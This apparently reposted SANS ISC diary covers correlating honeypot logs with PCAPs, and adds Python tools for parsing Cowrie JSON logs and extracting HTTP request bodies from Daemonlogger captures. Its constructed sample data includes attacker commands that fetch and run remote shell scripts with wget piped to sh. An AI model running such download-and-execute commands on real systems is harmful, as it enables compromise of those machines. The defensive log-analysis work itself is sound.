Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs

Simply parsing through the logs may not always give you a complete picture either.
This blog post walks through the steps I took to build a bigger picture for an attack observation, briefly going over the pieces involved: malicious files, HTTP requests, Cowrie and web honeypot JSON logs, and PCAPs.
Reviewing the Cowrie JSON logs pulls everything, with all relevant details for each IP address, into a format I find a bit easier to follow.
Some data may not always populate in the SIEM, so it isn't a bad idea to review the logs on the honeypot itself to confirm.
You could also parse the logs manually to get similar data.
For me, reviewing these requests in the SIEM or parsing through the logs still didn't answer why.
Since the SIEM wasn't cutting it for web requests, I turned to the logs on the sensors and parsed them manually.
Parsing the logs reveals a lot of detail about an IP address, or about individual web requests.
Once you understand the structure of the JSON files, it is simple to parse the logs on just about any search criteria.
In addition to manually parsing the files, as I did with the Telnet/SSH logs, I created a script specific to the format of these logs.
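As an added example, not the author's script and not part of Cowrie itself, here is a small Python parser for the Cowrie JSON logs mentioned above: it reads one JSON object per line, tolerates the malformed lines that log rotation or disk pressure can leave behind, folds everything into one record per source IP, and filters on any field. The log lines are constructed for the example; the field names it relies on (eventid, timestamp, src_ip, session, username, password, input, url, shasum, protocol) are the ones Cowrie writes.

```python
import json
import sys

# Constructed sample Cowrie JSON log (one object per line); not from a real
# sensor. The last line is deliberately truncated, as rotation can leave it.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51000,"dst_port":2222,"session":"a1b2c3d4","protocol":"ssh","timestamp":"2024-05-20T10:00:01.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2024-05-20T10:00:02.000000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2024-05-20T10:00:03.000000Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2024-05-20T10:00:04.000000Z"}
{"eventid":"cowrie.command.input","input":"wget http://198.51.100.9/x.sh -O /tmp/x.sh; sh /tmp/x.sh","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2024-05-20T10:00:05.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://198.51.100.9/x.sh","shasum":"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08","src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2024-05-20T10:00:06.000000Z"}
{"eventid":"cowrie.session.closed","duration":5.2,"src_ip":"203.0.113.7","session":"a1b2c3d4","timestamp":"2024-05-20T10:00:07.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"192.0.2.55","src_port":40000,"dst_port":2223,"session":"e5f6a7b8","protocol":"telnet","timestamp":"2024-05-20T11:30:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"192.0.2.55","session":"e5f6a7b8","timestamp":"2024-05-20T11:30:01.000000Z"}
{"eventid":"cowrie.session.closed","duration":1.0,"src_ip":"192.0.2.55","session":"e5f6a7b8","timestamp":"2024-05-20T11:30:02.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_po
"""


def parse_cowrie(lines):
    """Return (events, malformed_count). Bad lines are counted, not fatal."""
    events, bad = [], 0
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            bad += 1
            continue
        if not isinstance(ev, dict) or "eventid" not in ev:
            bad += 1
            continue
        events.append(ev)
    return events, bad


def summarize_by_ip(events):
    """Collapse the event stream into one record per source IP."""
    by_ip = {}
    for ev in events:
        ip, ts = ev.get("src_ip"), ev.get("timestamp", "")
        if not ip:
            continue
        rec = by_ip.setdefault(ip, {"first_seen": ts, "last_seen": ts,
                                    "sessions": set(), "protocols": set(),
                                    "logins": [], "commands": [], "downloads": []})
        # ISO-8601 timestamps in one fixed format sort correctly as strings
        rec["first_seen"], rec["last_seen"] = min(rec["first_seen"], ts), max(rec["last_seen"], ts)
        if "session" in ev:
            rec["sessions"].add(ev["session"])
        eid = ev["eventid"]
        if eid == "cowrie.session.connect":
            rec["protocols"].add(ev.get("protocol", "?"))
        elif eid in ("cowrie.login.success", "cowrie.login.failed"):
            rec["logins"].append((ev.get("username"), ev.get("password"), eid.endswith("success")))
        elif eid == "cowrie.command.input":
            rec["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            rec["downloads"].append((ev.get("url"), ev.get("shasum")))
    return by_ip


def filter_events(events, **criteria):
    """Select events by field: key=value is an exact match, key__contains=value
    a case-insensitive substring match (e.g. input__contains="wget")."""
    hits = []
    for ev in events:
        for key, want in criteria.items():
            if key.endswith("__contains"):
                if want.lower() not in str(ev.get(key[:-len("__contains")], "")).lower():
                    break
            elif ev.get(key) != want:
                break
        else:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:  # pass the Cowrie JSON file paths as arguments
        lines = [l for p in sys.argv[1:] for l in open(p, encoding="utf-8")]
    else:
        lines = SAMPLE_LOG.splitlines()
    events, bad = parse_cowrie(lines)
    print(f"{len(events)} events parsed, {bad} malformed line(s) skipped")
    for ip, rec in summarize_by_ip(events).items():
        print(f"\n{ip}  {rec['first_seen']} -> {rec['last_seen']}  "
              f"{sorted(rec['protocols'])}  sessions={len(rec['sessions'])}")
        for user, pw, ok in rec["logins"]:
            print(f"  login {user}:{pw} {'OK' if ok else 'failed'}")
        for cmd in rec["commands"]:
            print(f"  cmd   {cmd}")
        for url, sha in rec["downloads"]:
            print(f"  file  {url} sha256={sha}")
```

The per-IP record is what a SIEM view tends to flatten: which credentials worked, what was typed after login, and what was fetched (with the SHA-256 Cowrie recorded, so you can match it against the file in the downloads directory). `filter_events(events, eventid="cowrie.command.input", input__contains="wget")` is the "any search criteria" case from the text.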
While the web logs provide a lot of detail, this goes back to what I mentioned earlier: something still seemed to be missing, namely an answer to why these URLs are being accessed.
Running a honeypot provides only so much insight into what a threat actor is doing if all you review is the logs.
What you don't get from the honeypot's web logs is any indication of what the threat actor may be trying to do, at least not from what I was able to observe.
Going back to how Daemonlogger is set up, it writes one PCAP file to a daily folder.
Parsing through the honeypot logs, I couldn't find any correlation to that command.
Without it, all you would find in the logs is that the HTTP request method is POST and the URL is /device.
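As an added example of the log-to-PCAP correlation described above (not the diary author's tooling, and not part of Daemonlogger), here is a standard-library-only Python extractor: given what the web log does show, the method and URL (and optionally the source IP), it walks a libpcap file, reassembles each client-to-server TCP flow by sequence number, and returns the matching HTTP requests with their bodies. Assumptions: the capture is in classic libpcap format with Ethernet framing (pcapng is rejected), traffic is plaintext IPv4/HTTP, checksums are not validated, and reassembly is naive (no handling of retransmissions or overlaps). The traffic in SAMPLE_PCAP is constructed in the block itself, including the POST body, and only the /device path is taken from the text.

```python
import re
import socket
import struct
import sys
from collections import defaultdict


def _tcp_frame(src, sport, dst, dport, seq, payload):
    """Ethernet/IPv4/TCP frame with payload; checksums left zero (constructed data)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def build_pcap(frames):
    """Serialize (timestamp, frame) pairs as a little-endian libpcap file."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for ts, frame in frames:
        sec = int(ts)
        out += struct.pack("<IIII", sec, int((ts - sec) * 1e6), len(frame), len(frame)) + frame
    return out


# Constructed traffic, not from a real sensor: a POST to /device whose headers
# and JSON body arrive in separate TCP segments, plus an unrelated GET.
POST_BODY = b'{"method":"ping","cmd":"wget http://198.51.100.9/bot.sh -O- | sh"}'
POST_HDRS = (b"POST /device HTTP/1.1\r\nHost: 10.0.0.5\r\nContent-Type: application/json\r\n"
             b"Content-Length: %d\r\n\r\n" % len(POST_BODY))
SAMPLE_PCAP = build_pcap([
    (1716109201.10, _tcp_frame("203.0.113.7", 51333, "10.0.0.5", 8080, 1000, POST_HDRS)),
    (1716109201.12, _tcp_frame("203.0.113.7", 51333, "10.0.0.5", 8080, 1000 + len(POST_HDRS), POST_BODY)),
    (1716109230.00, _tcp_frame("192.0.2.55", 40001, "10.0.0.5", 8080, 5000,
                               b"GET / HTTP/1.1\r\nHost: 10.0.0.5\r\n\r\n")),
])


def iter_packets(pcap):
    """Yield (timestamp, frame) from a libpcap file of either byte order."""
    magic, = struct.unpack("<I", pcap[:4])
    if magic in (0xA1B2C3D4, 0xA1B23C4D):
        end = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):
        end = ">"
    else:
        raise ValueError("not a libpcap file (pcapng is not handled here)")
    nanos = magic in (0xA1B23C4D, 0x4D3CB2A1)
    linktype, = struct.unpack(end + "I", pcap[20:24])
    if linktype != 1:
        raise ValueError(f"expected Ethernet frames (linktype 1), got {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        sec, frac, incl, _orig = struct.unpack(end + "IIII", pcap[off:off + 16])
        off += 16
        yield sec + frac / (1e9 if nanos else 1e6), pcap[off:off + incl]
        off += incl


def tcp_segments(pcap):
    """Yield (ts, src, sport, dst, dport, seq, payload) for IPv4/TCP frames carrying data."""
    for ts, frame in iter_packets(pcap):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue
        ip = frame[14:]
        ihl, total = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:
            continue
        tcp = ip[ihl:total]  # IP total length also drops any Ethernet padding
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield ts, socket.inet_ntoa(ip[12:16]), sport, socket.inet_ntoa(ip[16:20]), dport, seq, payload


REQ_LINE = re.compile(rb"([A-Z]+) (\S+) HTTP/1\.[01]\r\n")


def http_requests(pcap):
    """Reassemble each flow by sequence number, then split the byte stream into
    requests, using Content-Length to delimit each body."""
    flows = defaultdict(list)
    for ts, src, sport, dst, dport, seq, data in tcp_segments(pcap):
        flows[(src, sport, dst, dport)].append((seq, ts, data))
    for (src, sport, dst, dport), segs in flows.items():
        segs.sort()  # naive: assumes no retransmissions or overlapping segments
        stream, pos = b"".join(d for _, _, d in segs), 0
        while (m := REQ_LINE.match(stream, pos)):
            hdr_end = stream.find(b"\r\n\r\n", pos)
            if hdr_end < 0:
                break  # headers never completed in this capture
            headers = stream[m.end():hdr_end].decode("latin-1")
            clen = re.search(r"(?im)^Content-Length:\s*(\d+)", headers)
            want = int(clen.group(1)) if clen else 0
            body = stream[hdr_end + 4:hdr_end + 4 + want]
            yield {"ts": segs[0][1], "src": src, "sport": sport, "dst": dst, "dport": dport,
                   "method": m.group(1).decode(), "path": m.group(2).decode("latin-1"),
                   "headers": headers, "body": body, "complete": len(body) == want}
            pos = hdr_end + 4 + want


def find_requests(pcap, method, path, src_ip=None):
    """Method + URL (what the honeypot web log shows), optionally narrowed by
    source IP, is enough to pull the matching request bodies out of the PCAP."""
    return [r for r in http_requests(pcap)
            if r["method"] == method and r["path"] == path and src_ip in (None, r["src"])]


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for r in find_requests(data, "POST", "/device"):
        print(f"{r['src']}:{r['sport']} -> {r['dst']}:{r['dport']} {r['method']} {r['path']}")
        print("  body:", r["body"].decode("latin-1"), "" if r["complete"] else "(truncated)")
```

Point it at the day's file in the Daemonlogger folder (or at a tcpdump pre-filter such as `port 8080 and host <ip>` written to a smaller file) and the `complete` flag tells you whether the capture actually held the whole body or the snaplen or rotation cut it short; that distinction matters before you conclude what the POST was trying to do.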
If you didn't catch the details regarding data retention on the sensor at the start of the internship, the logs are deleted at set intervals.
My first or second attack observation included logs that happened to be at the tail end of that window, just before they were deleted.
If you want long-term retention of any of the logs, set up an automatic transfer to a separate system or to a separate folder on the sensor, and make sure that job runs more often than the deletion interval.


This Cyber News was published on isc.sans.edu. Publication date: Wed, 29 May 2024 01:13:14 +0000